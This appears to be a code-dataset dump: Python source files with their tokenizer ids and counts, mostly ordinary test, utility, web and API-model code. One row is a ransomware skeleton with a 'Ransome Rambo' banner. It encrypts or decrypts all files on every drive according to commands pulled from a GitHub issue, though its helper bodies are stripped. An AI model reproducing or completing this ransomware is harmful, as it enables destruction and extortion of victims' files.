content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
# Copyright 2009-2012 Yelp and Contributors
# Copyright 2014 Ed Schofield
# Copyright 2015 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""We use this to test jobs that emit a large amount of stderr."""
from __future__ import print_function
import sys
from mrjob.job import MRJob
if __name__ == '__main__':
MRVerboseJob.run()
| [
2,
15069,
3717,
12,
6999,
44628,
290,
25767,
669,
198,
2,
15069,
1946,
1717,
3059,
1659,
1164,
198,
2,
15069,
1853,
44628,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
... | 3.666667 | 228 |
import json
import subprocess
import requests
from agent import WindowsAgent
| [
11748,
33918,
201,
198,
11748,
850,
14681,
201,
198,
201,
198,
11748,
7007,
201,
198,
201,
198,
6738,
5797,
1330,
3964,
36772,
201,
198,
201,
198
] | 3.346154 | 26 |
import os
from cryptography import fernet
from cryptography.fernet import Fernet
from binascii import Error
import string
from ctypes import windll
from glob import glob
from github import Github
from uuid import getnode as get_mac
from os import path
import sys
k="_________________________YOUR_KEY_________________________"
global tDirs
global tFiles
print('''
____ ____ _ / \__
| _ \ __ _ _ __ ___ ___ _ __ ___ ___ | _ \ __ _ _ __ ___ | |__ ___ ( @\___
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \ / _ \ | |_) / _` | '_ ` _ \| '_ \ / _ \ / O
| _ < (_| | | | \__ \ (_) | | | | | | __/ | _ < (_| | | | | | | |_) | (_) | / (_____/
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___| |_| \_\__,_|_| |_| |_|_.__/ \___/ /_____/ ''')
if __name__ == '__main__':
lis = get_drives()
try:
data=get_hub()
if data == " ":
git_up("NEW_ENTRY","NULL")
elif "ENCRYPT" in data:
for l in lis:
scan_e(l+":\\")
git_up("SUCCESSFULL","FULLY_E_N_CRYPTED")
elif "DECRYPT" in data:
for l in lis:
scan_d(l+":\\")
git_up("SUCCESSFULL","FULLY_D_E_CRYPTED")
except:
release_issue()
data=get_hub()
pass
| [
11748,
28686,
198,
6738,
45898,
1330,
277,
1142,
316,
198,
6738,
45898,
13,
69,
1142,
316,
1330,
38982,
316,
198,
6738,
9874,
292,
979,
72,
1330,
13047,
198,
11748,
4731,
198,
6738,
269,
19199,
1330,
2344,
297,
198,
6738,
15095,
1330,
... | 1.868163 | 713 |
"""CSI Controller Identity RPC tests."""
from pytest_bdd import (
given,
scenario,
then,
when,
)
import pytest
import docker
import subprocess
import csi_pb2 as pb
from common.csi import CsiHandle
from common.deployer import Deployer
from common.apiclient import ApiClient
@pytest.fixture(scope="module")
@scenario("identity.feature", "get plugin information")
def test_plugin_info(setup):
"""get plugin information"""
@scenario("identity.feature", "get plugin capabilities")
def test_plugin_capabilities(setup):
"""get plugin capabilities"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is accessible",
)
def test_probe_rest_accessible(setup):
"""probe when REST is accessible"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is not accessible",
)
def test_probe_rest_not_accessible(setup):
"""probe when REST is not accessible"""
@given("a running CSI controller plugin", target_fixture="csi_instance")
@given(
"a running CSI controller plugin with accessible REST API endpoint",
target_fixture="csi_plugin",
)
@pytest.fixture(scope="function")
@given(
"a running CSI controller plugin without REST API server running",
target_fixture="csi_plugin_partial",
)
@when(
"a GetPluginInfo request is sent to CSI controller", target_fixture="info_request"
)
@then("CSI controller should report its name and version")
@when(
"a GetPluginCapabilities request is sent to CSI controller",
target_fixture="caps_request",
)
@then("CSI controller should report its capabilities")
@when("a Probe request is sent to CSI controller", target_fixture="probe_available")
@when(
"a Probe request is sent to CSI controller which can not access REST API endpoint",
target_fixture="probe_not_available",
)
@then("CSI controller should report itself as being ready")
@then("CSI controller should report itself as being ready")
@then("CSI controller should report itself as being not ready")
| [
37811,
7902,
40,
22741,
27207,
39400,
5254,
526,
15931,
198,
6738,
12972,
9288,
62,
65,
1860,
1330,
357,
198,
220,
220,
220,
1813,
11,
198,
220,
220,
220,
8883,
11,
198,
220,
220,
220,
788,
11,
198,
220,
220,
220,
618,
11,
198,
8,... | 3.267516 | 628 |
DATA_ID = 61
| [
26947,
62,
2389,
796,
8454,
198
] | 2.166667 | 6 |
import torch.nn as nn
import torch as tr
| [
11748,
28034,
13,
20471,
355,
299,
77,
198,
11748,
28034,
355,
491,
628,
198
] | 3.071429 | 14 |
"""This module contains dust features."""
import os
import sncosmo as snc
import sfdmap
from snsim import __snsim_dir_path__
import glob
import requests
import tarfile
def check_files_and_dowload():
"""Check if sdfmap files are here and download if not.
Returns
-------
None
No return, just download files.
"""
files_in_dust_data = glob.glob(__snsim_dir_path__ + '/dust_data/*.fits')
files_list = ['SFD_dust_4096_ngp.fits', 'SFD_dust_4096_sgp.fits',
'SFD_mask_4096_ngp.fits', 'SFD_mask_4096_sgp.fits']
filenames = []
for file in files_in_dust_data:
filenames.append(os.path.basename(file))
for file in files_list:
if file not in filenames:
print("Dowloading sfdmap files from https://github.com/kbarbary/sfddata/")
url = "https://github.com/kbarbary/sfddata/archive/master.tar.gz"
response = requests.get(url, stream=True)
file = tarfile.open(fileobj=response.raw, mode="r|gz")
file.extractall(path=__snsim_dir_path__ + '/dust_data')
new_file = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*.fits')
for nfile in new_file:
os.replace(nfile, __snsim_dir_path__ + '/dust_data/' + os.path.basename(nfile))
other_files = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*')
for ofile in other_files:
os.remove(ofile)
os.rmdir(__snsim_dir_path__ + '/dust_data/sfddata-master')
break
def init_mw_dust(model, mw_dust):
"""Set MW dut effect on sncosmo model.
Parameters
----------
model : sncosmo.Model
The sncosmo model which to add the mw dust.
mw_dust_mod : dic
The model of dust to apply.
Returns
-------
None
Directly modify the sncosmo model.
"""
f99_r_v = 3.1
if 'rv' in mw_dust:
f99_r_v = mw_dust['rv']
if mw_dust['model'].lower() == 'ccm89':
dust = snc.CCM89Dust()
elif mw_dust['model'].lower() == 'od94':
dust = snc.OD94Dust()
elif mw_dust['model'].lower() == 'f99':
dust = snc.F99Dust(r_v=f99_r_v)
else:
raise ValueError(f"{mw_dust['model']} model does not exist in sncosmo")
model.add_effect(dust, frame='obs', name='mw_')
def add_mw_to_fit(fit_model, mwebv, mod_name, rv=3.1):
"""Set mw model parameters of a sncsomo model.
Parameters
----------
fit_model : type
Description of parameter `fit_model`.
mwebv : float
E(B-V) color excess of the sn.
rv : float
R_v coeff of the MW.
Returns
-------
None
Directly modify the sncosmo model.
"""
if 'mw_' in fit_model.effect_names:
fit_model.set(mw_ebv=mwebv)
if mod_name .lower() not in ['f99']:
fit_model.set(mw_r_v=rv)
def compute_ebv(ra, dec):
"""Compute E(B-V) color excess.
Parameters
----------
ra : float or numpy.ndarray
Right Ascension.
dec : float or numpy.ndarray
Declinaison.
Returns
-------
float or numpy.ndarray
The color excess correponding to ra, dec coordinates.
"""
map = sfdmap.SFDMap(__snsim_dir_path__ + '/dust_data')
ebv = map.ebv(ra, dec, unit='radian')
return ebv
| [
37811,
1212,
8265,
4909,
8977,
3033,
526,
15931,
198,
198,
11748,
28686,
198,
11748,
3013,
6966,
5908,
355,
3013,
66,
198,
11748,
264,
16344,
8899,
198,
6738,
3013,
14323,
1330,
11593,
82,
5907,
320,
62,
15908,
62,
6978,
834,
198,
11748... | 2.132948 | 1,557 |
#!/usr/env/bin python
# -*- encoding: utf-8 -*-
__author__ = 'Nb'
| [
2,
48443,
14629,
14,
24330,
14,
8800,
21015,
198,
2,
532,
9,
12,
21004,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
834,
9800,
834,
796,
705,
45,
65,
6,
198
] | 2.030303 | 33 |
from flask import Flask, redirect, render_template, request
import db
import message
import random
import read
import delete
import addressbook
import sent as sent_
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
@app.route("/sent/", methods=['GET', 'POST'])
@app.route("/read/<id>")
@app.route("/addressbook/", methods=['GET', 'POST'])
@app.route("/reply/<to>/<title>/", methods=['GET', 'POST'])
@app.route("/send/", methods=['GET', 'POST'])
if __name__ == "__main__":
app.run(debug=True, port=5044)
| [
6738,
42903,
1330,
46947,
11,
18941,
11,
8543,
62,
28243,
11,
2581,
198,
11748,
20613,
198,
11748,
3275,
198,
11748,
4738,
198,
11748,
1100,
198,
11748,
12233,
198,
11748,
2209,
2070,
198,
11748,
1908,
355,
1908,
62,
198,
198,
1324,
796... | 2.693878 | 196 |
import math
from typing import Callable, Tuple
import numpy as np
import torch
import torch.nn as nn
from loguru import logger
from tqdm import tqdm
from alexander.dqn.buffer import ReplayBuffer
from alexander.dqn.hiv_patient import HIVPatient
from alexander.dqn.q_agent import Agent
from dataclasses import dataclass
@dataclass
@dataclass
| [
11748,
10688,
198,
6738,
19720,
1330,
4889,
540,
11,
309,
29291,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
6738,
2604,
14717,
1330,
49706,
198,
6738,
256,
80,
36020,
133... | 3.087719 | 114 |
from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from kami.database import Pages
| [
6738,
3491,
21348,
13,
27171,
1574,
13,
8692,
1330,
7308,
6535,
51,
5868,
2509,
1574,
11,
19390,
31077,
12915,
4122,
198,
6738,
3491,
21348,
13,
8897,
3558,
1330,
19390,
198,
6738,
3491,
21348,
13,
16733,
274,
1330,
18261,
198,
198,
673... | 4.083333 | 48 |
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" Module for statistics calculation side of the ui"""
from PyQt5.QtWidgets import QVBoxLayout, QWidget, QLabel, QPushButton, QFileDialog
class GUIStatisticsCalculation(QWidget):
""" Right side of UI, ie. the statistics calculation settings and parameters."""
def calculator_selected(self, calculator_params, calculator_name, calculator_desc):
""" when calculator has been selected, this willc reate ui for for the calculation side """
while self._main_layout.count() > 0:
self._main_layout.itemAt(0).widget().setParent(None)
title = QLabel(calculator_name)
self._main_layout.addWidget(title)
desc = QLabel(calculator_desc)
self._main_layout.addWidget(desc)
self._load_file_btn = QPushButton("Lataa excel tiedosto")
self._load_file_btn.clicked.connect(self._load_file)
self._main_layout.addWidget(self._load_file_btn)
self.calculate_btn = QPushButton("Laske tilasto")
self.calculate_btn.setEnabled(False)
self._main_layout.addWidget(self.calculate_btn)
def _load_file(self):
"""Method that is called when load file button is pushed"""
self._excel_file_name = QFileDialog.getOpenFileName()[0]
print(self._excel_file_name)
filename = QLabel(self._excel_file_name)
self._main_layout.addWidget(filename)
self.calculate_btn.setEnabled(True)
def get_excel_file(self):
""" Method for returning selected excel"""
return self._excel_file_name
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
12,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
19937,
329,
7869,
17952,
1735,
286,
262,
334,
72,
37811,
198,
198,
6738,
9485,
48,
83,
20,
13,
48,
83,
54... | 2.555016 | 618 |
import pytest
import numpy as np
from awkward import JaggedArray
from fast_carpenter import expressions
@pytest.mark.parametrize('input, expected', [
("Muon.Px > 30", ("Muon__DOT__Px > 30", {'Muon__DOT__Px': 'Muon.Px'})),
("events.Muon.Px > 30", ("events__DOT__Muon__DOT__Px > 30",
{'events__DOT__Muon__DOT__Px': 'events.Muon.Px'})),
('l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et > 50',
('l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et > 50',
{'l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et':
'l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et'}))
])
| [
11748,
12972,
9288,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
13006,
1330,
449,
14655,
19182,
198,
6738,
3049,
62,
66,
5117,
9255,
1330,
14700,
628,
628,
628,
628,
198,
198,
31,
9078,
9288,
13,
4102,
13,
17143,
316,
380,
2736,
10... | 1.933526 | 346 |
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
try:
__all__ = ['StoppingCriterion', 'Tuner', 'Reporter']
from pathlib import Path
from syne_tune.stopping_criterion import StoppingCriterion
from syne_tune.report import Reporter
from syne_tune.tuner import Tuner
except ImportError:
pass
__version__ = read_version()
| [
2,
15069,
33448,
6186,
13,
785,
11,
3457,
13,
393,
663,
29116,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
11074,
198,
2,
921,
743,
407,
779,
428,
2393,
... | 3.337165 | 261 |
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.free_style_build import FreeStyleBuild
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport
from openapi_server.models.null_scm import NullSCM
from openapi_server import util
from openapi_server.models.free_style_build import FreeStyleBuild # noqa: E501
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions # noqa: E501
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport # noqa: E501
from openapi_server.models.null_scm import NullSCM # noqa: E501
class FreeStyleProject(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, _class=None, name=None, url=None, color=None, actions=None, description=None, display_name=None, display_name_or_null=None, full_display_name=None, full_name=None, buildable=None, builds=None, first_build=None, health_report=None, in_queue=None, keep_dependencies=None, last_build=None, last_completed_build=None, last_failed_build=None, last_stable_build=None, last_successful_build=None, last_unstable_build=None, last_unsuccessful_build=None, next_build_number=None, queue_item=None, concurrent_build=None, scm=None): # noqa: E501
"""FreeStyleProject - a model defined in OpenAPI
:param _class: The _class of this FreeStyleProject. # noqa: E501
:type _class: str
:param name: The name of this FreeStyleProject. # noqa: E501
:type name: str
:param url: The url of this FreeStyleProject. # noqa: E501
:type url: str
:param color: The color of this FreeStyleProject. # noqa: E501
:type color: str
:param actions: The actions of this FreeStyleProject. # noqa: E501
:type actions: List[FreeStyleProjectactions]
:param description: The description of this FreeStyleProject. # noqa: E501
:type description: str
:param display_name: The display_name of this FreeStyleProject. # noqa: E501
:type display_name: str
:param display_name_or_null: The display_name_or_null of this FreeStyleProject. # noqa: E501
:type display_name_or_null: str
:param full_display_name: The full_display_name of this FreeStyleProject. # noqa: E501
:type full_display_name: str
:param full_name: The full_name of this FreeStyleProject. # noqa: E501
:type full_name: str
:param buildable: The buildable of this FreeStyleProject. # noqa: E501
:type buildable: bool
:param builds: The builds of this FreeStyleProject. # noqa: E501
:type builds: List[FreeStyleBuild]
:param first_build: The first_build of this FreeStyleProject. # noqa: E501
:type first_build: FreeStyleBuild
:param health_report: The health_report of this FreeStyleProject. # noqa: E501
:type health_report: List[FreeStyleProjecthealthReport]
:param in_queue: The in_queue of this FreeStyleProject. # noqa: E501
:type in_queue: bool
:param keep_dependencies: The keep_dependencies of this FreeStyleProject. # noqa: E501
:type keep_dependencies: bool
:param last_build: The last_build of this FreeStyleProject. # noqa: E501
:type last_build: FreeStyleBuild
:param last_completed_build: The last_completed_build of this FreeStyleProject. # noqa: E501
:type last_completed_build: FreeStyleBuild
:param last_failed_build: The last_failed_build of this FreeStyleProject. # noqa: E501
:type last_failed_build: str
:param last_stable_build: The last_stable_build of this FreeStyleProject. # noqa: E501
:type last_stable_build: FreeStyleBuild
:param last_successful_build: The last_successful_build of this FreeStyleProject. # noqa: E501
:type last_successful_build: FreeStyleBuild
:param last_unstable_build: The last_unstable_build of this FreeStyleProject. # noqa: E501
:type last_unstable_build: str
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject. # noqa: E501
:type last_unsuccessful_build: str
:param next_build_number: The next_build_number of this FreeStyleProject. # noqa: E501
:type next_build_number: int
:param queue_item: The queue_item of this FreeStyleProject. # noqa: E501
:type queue_item: str
:param concurrent_build: The concurrent_build of this FreeStyleProject. # noqa: E501
:type concurrent_build: bool
:param scm: The scm of this FreeStyleProject. # noqa: E501
:type scm: NullSCM
"""
self.openapi_types = {
'_class': str,
'name': str,
'url': str,
'color': str,
'actions': List[FreeStyleProjectactions],
'description': str,
'display_name': str,
'display_name_or_null': str,
'full_display_name': str,
'full_name': str,
'buildable': bool,
'builds': List[FreeStyleBuild],
'first_build': FreeStyleBuild,
'health_report': List[FreeStyleProjecthealthReport],
'in_queue': bool,
'keep_dependencies': bool,
'last_build': FreeStyleBuild,
'last_completed_build': FreeStyleBuild,
'last_failed_build': str,
'last_stable_build': FreeStyleBuild,
'last_successful_build': FreeStyleBuild,
'last_unstable_build': str,
'last_unsuccessful_build': str,
'next_build_number': int,
'queue_item': str,
'concurrent_build': bool,
'scm': NullSCM
}
self.attribute_map = {
'_class': '_class',
'name': 'name',
'url': 'url',
'color': 'color',
'actions': 'actions',
'description': 'description',
'display_name': 'displayName',
'display_name_or_null': 'displayNameOrNull',
'full_display_name': 'fullDisplayName',
'full_name': 'fullName',
'buildable': 'buildable',
'builds': 'builds',
'first_build': 'firstBuild',
'health_report': 'healthReport',
'in_queue': 'inQueue',
'keep_dependencies': 'keepDependencies',
'last_build': 'lastBuild',
'last_completed_build': 'lastCompletedBuild',
'last_failed_build': 'lastFailedBuild',
'last_stable_build': 'lastStableBuild',
'last_successful_build': 'lastSuccessfulBuild',
'last_unstable_build': 'lastUnstableBuild',
'last_unsuccessful_build': 'lastUnsuccessfulBuild',
'next_build_number': 'nextBuildNumber',
'queue_item': 'queueItem',
'concurrent_build': 'concurrentBuild',
'scm': 'scm'
}
self.__class = _class
self._name = name
self._url = url
self._color = color
self._actions = actions
self._description = description
self._display_name = display_name
self._display_name_or_null = display_name_or_null
self._full_display_name = full_display_name
self._full_name = full_name
self._buildable = buildable
self._builds = builds
self._first_build = first_build
self._health_report = health_report
self._in_queue = in_queue
self._keep_dependencies = keep_dependencies
self._last_build = last_build
self._last_completed_build = last_completed_build
self._last_failed_build = last_failed_build
self._last_stable_build = last_stable_build
self._last_successful_build = last_successful_build
self._last_unstable_build = last_unstable_build
self._last_unsuccessful_build = last_unsuccessful_build
self._next_build_number = next_build_number
self._queue_item = queue_item
self._concurrent_build = concurrent_build
self._scm = scm
@classmethod
def from_dict(cls, dikt) -> 'FreeStyleProject':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The FreeStyleProject of this FreeStyleProject. # noqa: E501
:rtype: FreeStyleProject
"""
return util.deserialize_model(dikt, cls)
@property
def _class(self):
"""Gets the _class of this FreeStyleProject.
:return: The _class of this FreeStyleProject.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this FreeStyleProject.
:param _class: The _class of this FreeStyleProject.
:type _class: str
"""
self.__class = _class
@property
def name(self):
"""Gets the name of this FreeStyleProject.
:return: The name of this FreeStyleProject.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FreeStyleProject.
:param name: The name of this FreeStyleProject.
:type name: str
"""
self._name = name
@property
def url(self):
"""Gets the url of this FreeStyleProject.
:return: The url of this FreeStyleProject.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this FreeStyleProject.
:param url: The url of this FreeStyleProject.
:type url: str
"""
self._url = url
@property
def color(self):
"""Gets the color of this FreeStyleProject.
:return: The color of this FreeStyleProject.
:rtype: str
"""
return self._color
@color.setter
def color(self, color):
"""Sets the color of this FreeStyleProject.
:param color: The color of this FreeStyleProject.
:type color: str
"""
self._color = color
@property
def actions(self):
"""Gets the actions of this FreeStyleProject.
:return: The actions of this FreeStyleProject.
:rtype: List[FreeStyleProjectactions]
"""
return self._actions
@actions.setter
def actions(self, actions):
"""Sets the actions of this FreeStyleProject.
:param actions: The actions of this FreeStyleProject.
:type actions: List[FreeStyleProjectactions]
"""
self._actions = actions
@property
def description(self):
"""Gets the description of this FreeStyleProject.
:return: The description of this FreeStyleProject.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this FreeStyleProject.
:param description: The description of this FreeStyleProject.
:type description: str
"""
self._description = description
@property
def display_name(self):
"""Gets the display_name of this FreeStyleProject.
:return: The display_name of this FreeStyleProject.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this FreeStyleProject.
:param display_name: The display_name of this FreeStyleProject.
:type display_name: str
"""
self._display_name = display_name
@property
def display_name_or_null(self):
"""Gets the display_name_or_null of this FreeStyleProject.
:return: The display_name_or_null of this FreeStyleProject.
:rtype: str
"""
return self._display_name_or_null
@display_name_or_null.setter
def display_name_or_null(self, display_name_or_null):
"""Sets the display_name_or_null of this FreeStyleProject.
:param display_name_or_null: The display_name_or_null of this FreeStyleProject.
:type display_name_or_null: str
"""
self._display_name_or_null = display_name_or_null
@property
def full_display_name(self):
"""Gets the full_display_name of this FreeStyleProject.
:return: The full_display_name of this FreeStyleProject.
:rtype: str
"""
return self._full_display_name
@full_display_name.setter
def full_display_name(self, full_display_name):
"""Sets the full_display_name of this FreeStyleProject.
:param full_display_name: The full_display_name of this FreeStyleProject.
:type full_display_name: str
"""
self._full_display_name = full_display_name
@property
def full_name(self):
"""Gets the full_name of this FreeStyleProject.
:return: The full_name of this FreeStyleProject.
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this FreeStyleProject.
:param full_name: The full_name of this FreeStyleProject.
:type full_name: str
"""
self._full_name = full_name
@property
def buildable(self):
"""Gets the buildable of this FreeStyleProject.
:return: The buildable of this FreeStyleProject.
:rtype: bool
"""
return self._buildable
@buildable.setter
def buildable(self, buildable):
"""Sets the buildable of this FreeStyleProject.
:param buildable: The buildable of this FreeStyleProject.
:type buildable: bool
"""
self._buildable = buildable
@property
def builds(self):
"""Gets the builds of this FreeStyleProject.
:return: The builds of this FreeStyleProject.
:rtype: List[FreeStyleBuild]
"""
return self._builds
@builds.setter
def builds(self, builds):
"""Sets the builds of this FreeStyleProject.
:param builds: The builds of this FreeStyleProject.
:type builds: List[FreeStyleBuild]
"""
self._builds = builds
@property
def first_build(self):
"""Gets the first_build of this FreeStyleProject.
:return: The first_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._first_build
@first_build.setter
def first_build(self, first_build):
"""Sets the first_build of this FreeStyleProject.
:param first_build: The first_build of this FreeStyleProject.
:type first_build: FreeStyleBuild
"""
self._first_build = first_build
@property
def health_report(self):
"""Gets the health_report of this FreeStyleProject.
:return: The health_report of this FreeStyleProject.
:rtype: List[FreeStyleProjecthealthReport]
"""
return self._health_report
@health_report.setter
def health_report(self, health_report):
"""Sets the health_report of this FreeStyleProject.
:param health_report: The health_report of this FreeStyleProject.
:type health_report: List[FreeStyleProjecthealthReport]
"""
self._health_report = health_report
@property
def in_queue(self):
"""Gets the in_queue of this FreeStyleProject.
:return: The in_queue of this FreeStyleProject.
:rtype: bool
"""
return self._in_queue
@in_queue.setter
def in_queue(self, in_queue):
"""Sets the in_queue of this FreeStyleProject.
:param in_queue: The in_queue of this FreeStyleProject.
:type in_queue: bool
"""
self._in_queue = in_queue
@property
def keep_dependencies(self):
"""Gets the keep_dependencies of this FreeStyleProject.
:return: The keep_dependencies of this FreeStyleProject.
:rtype: bool
"""
return self._keep_dependencies
@keep_dependencies.setter
def keep_dependencies(self, keep_dependencies):
"""Sets the keep_dependencies of this FreeStyleProject.
:param keep_dependencies: The keep_dependencies of this FreeStyleProject.
:type keep_dependencies: bool
"""
self._keep_dependencies = keep_dependencies
@property
def last_build(self):
"""Gets the last_build of this FreeStyleProject.
:return: The last_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_build
@last_build.setter
def last_build(self, last_build):
"""Sets the last_build of this FreeStyleProject.
:param last_build: The last_build of this FreeStyleProject.
:type last_build: FreeStyleBuild
"""
self._last_build = last_build
@property
def last_completed_build(self):
"""Gets the last_completed_build of this FreeStyleProject.
:return: The last_completed_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_completed_build
@last_completed_build.setter
def last_completed_build(self, last_completed_build):
"""Sets the last_completed_build of this FreeStyleProject.
:param last_completed_build: The last_completed_build of this FreeStyleProject.
:type last_completed_build: FreeStyleBuild
"""
self._last_completed_build = last_completed_build
@property
def last_failed_build(self):
"""Gets the last_failed_build of this FreeStyleProject.
:return: The last_failed_build of this FreeStyleProject.
:rtype: str
"""
return self._last_failed_build
@last_failed_build.setter
def last_failed_build(self, last_failed_build):
"""Sets the last_failed_build of this FreeStyleProject.
:param last_failed_build: The last_failed_build of this FreeStyleProject.
:type last_failed_build: str
"""
self._last_failed_build = last_failed_build
@property
def last_stable_build(self):
"""Gets the last_stable_build of this FreeStyleProject.
:return: The last_stable_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_stable_build
@last_stable_build.setter
def last_stable_build(self, last_stable_build):
"""Sets the last_stable_build of this FreeStyleProject.
:param last_stable_build: The last_stable_build of this FreeStyleProject.
:type last_stable_build: FreeStyleBuild
"""
self._last_stable_build = last_stable_build
@property
def last_successful_build(self):
"""Gets the last_successful_build of this FreeStyleProject.
:return: The last_successful_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_successful_build
@last_successful_build.setter
def last_successful_build(self, last_successful_build):
"""Sets the last_successful_build of this FreeStyleProject.
:param last_successful_build: The last_successful_build of this FreeStyleProject.
:type last_successful_build: FreeStyleBuild
"""
self._last_successful_build = last_successful_build
@property
def last_unstable_build(self):
"""Gets the last_unstable_build of this FreeStyleProject.
:return: The last_unstable_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unstable_build
@last_unstable_build.setter
def last_unstable_build(self, last_unstable_build):
"""Sets the last_unstable_build of this FreeStyleProject.
:param last_unstable_build: The last_unstable_build of this FreeStyleProject.
:type last_unstable_build: str
"""
self._last_unstable_build = last_unstable_build
@property
def last_unsuccessful_build(self):
"""Gets the last_unsuccessful_build of this FreeStyleProject.
:return: The last_unsuccessful_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unsuccessful_build
@last_unsuccessful_build.setter
def last_unsuccessful_build(self, last_unsuccessful_build):
"""Sets the last_unsuccessful_build of this FreeStyleProject.
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject.
:type last_unsuccessful_build: str
"""
self._last_unsuccessful_build = last_unsuccessful_build
@property
def next_build_number(self):
"""Gets the next_build_number of this FreeStyleProject.
:return: The next_build_number of this FreeStyleProject.
:rtype: int
"""
return self._next_build_number
@next_build_number.setter
def next_build_number(self, next_build_number):
"""Sets the next_build_number of this FreeStyleProject.
:param next_build_number: The next_build_number of this FreeStyleProject.
:type next_build_number: int
"""
self._next_build_number = next_build_number
@property
def queue_item(self):
"""Gets the queue_item of this FreeStyleProject.
:return: The queue_item of this FreeStyleProject.
:rtype: str
"""
return self._queue_item
@queue_item.setter
def queue_item(self, queue_item):
"""Sets the queue_item of this FreeStyleProject.
:param queue_item: The queue_item of this FreeStyleProject.
:type queue_item: str
"""
self._queue_item = queue_item
@property
def concurrent_build(self):
"""Gets the concurrent_build of this FreeStyleProject.
:return: The concurrent_build of this FreeStyleProject.
:rtype: bool
"""
return self._concurrent_build
@concurrent_build.setter
def concurrent_build(self, concurrent_build):
"""Sets the concurrent_build of this FreeStyleProject.
:param concurrent_build: The concurrent_build of this FreeStyleProject.
:type concurrent_build: bool
"""
self._concurrent_build = concurrent_build
@property
def scm(self):
"""Gets the scm of this FreeStyleProject.
:return: The scm of this FreeStyleProject.
:rtype: NullSCM
"""
return self._scm
@scm.setter
def scm(self, scm):
"""Sets the scm of this FreeStyleProject.
:param scm: The scm of this FreeStyleProject.
:type scm: NullSCM
"""
self._scm = scm
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
4818,
8079,
1330,
3128,
11,
4818,
8079,
220,
1303,
645,
20402,
25,
376,
21844,
198,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
220... | 2.44462 | 9,471 |
#!/usr/bin/python
import monkDebug as debug
import monkModule as module
access_list = ['private', 'protected', 'public']
genericUID = 0
##
## @ brief only for namespace :
##
##
##
## @brief Get the list of all specify type
## @param[in] type Type requested ['namespace', 'class', 'struct', 'methode', 'enum', 'define', 'union', 'variable', 'constructor', 'destructor'] (can be a list)
## @param[in] sorted Request to sort the return list.
## @return The requested list or []
##
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
11748,
27266,
27509,
355,
14257,
198,
11748,
27266,
26796,
355,
8265,
198,
198,
15526,
62,
4868,
796,
37250,
19734,
3256,
705,
24326,
3256,
705,
11377,
20520,
198,
198,
41357,
